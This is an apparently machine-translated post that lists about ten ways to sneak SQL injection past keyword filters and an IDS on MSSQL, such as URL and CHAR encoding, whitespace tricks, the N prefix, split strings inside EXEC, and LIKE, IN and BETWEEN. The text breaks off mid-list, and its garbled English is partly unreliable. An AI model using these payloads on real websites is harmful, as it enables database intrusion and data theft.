Thought suddenly whether we can use what method to bypass the limit which SQL pours into? To-line inspected, mentioned the method mostly is aims at AND with “'” and “=” the filtration breakthrough, although a little progressive place, but has some key words not to bypass, because I not often invade the website, therefore does not dare to the above filtration effect to carry on the commentary, what but may be affirmative, the effect will not be good ......
After mine collection, majority of against poured into the procedure to filter the following key words:
and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | =
But here most difficult to process is select this key words, then how we did break through them? Although the question has not solved completely, but says with everybody shares, hoped that can offer a few ordinary introductory remarks so that others may offer their valuable ideas.
Regarding the key words filtration, the following is I collects as well as my some ideas.
1st, bypasses using the coding technique
If the URLEncode code, the ASCII code bypasses. For example or 1=1 namely
%6f%72%20%31%3d%31, but Test may also be CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116).
2nd, bypasses through the blank space
If two blank spaces replace a blank space, replaces the blank space with Tab and so on, or deletion all blank spaces, like
or' swords' = `swords'
, as a result of the mssql looseness, we may 'between the swords' blank space remove or, does not affect the movement.
3rd, replaces using the string of character judgment
Judgment bypasses with classics or the 1=1, like
or 'swords' = ' swords'
, this method is on-line at the discussion.
4th, bypasses through type conversion beautification symbol N
May say that this is a good idea, he except can bypass the limit to a certain extent, moreover is also able to discriminate the function, everybody think well. About use, if or 'swords' = N' swords', capital letter N tells mssql the server string of character to take the nvarchar type, it plays the type conversion the role, does not affect the injection sentence itself, but may evade based on knowledge pattern matching IDS.
5th, opens the solution string of character through + the number to bypass
The effect is worth researching, but is one method after all. Like
or 'swords' = `sw' + ' ords'; EXEC (`IN' + ' SERT INTO '+ ' ..... ')
6th, bypasses through LIKE
Before how hasn't thought? If or
'swords' LIKE 'sw'
!!! Obviously may very relaxed round
“=” “>”
Limit ......
7th, bypasses through IN
Is similar with the above LIKE mentality, like
or 'swords' IN ('swords')
8th, bypasses through BETWEEN
If or 'swords' BETWEEN 'rw' AND 'tw'
9th, through > or < bypasses
or 'swords' > 'sw'
or 'swords' < 'tw'
or 1<3
......
10th, bypasses using the annotation sentence
Other pages: : 1 * 2 * Next>>
|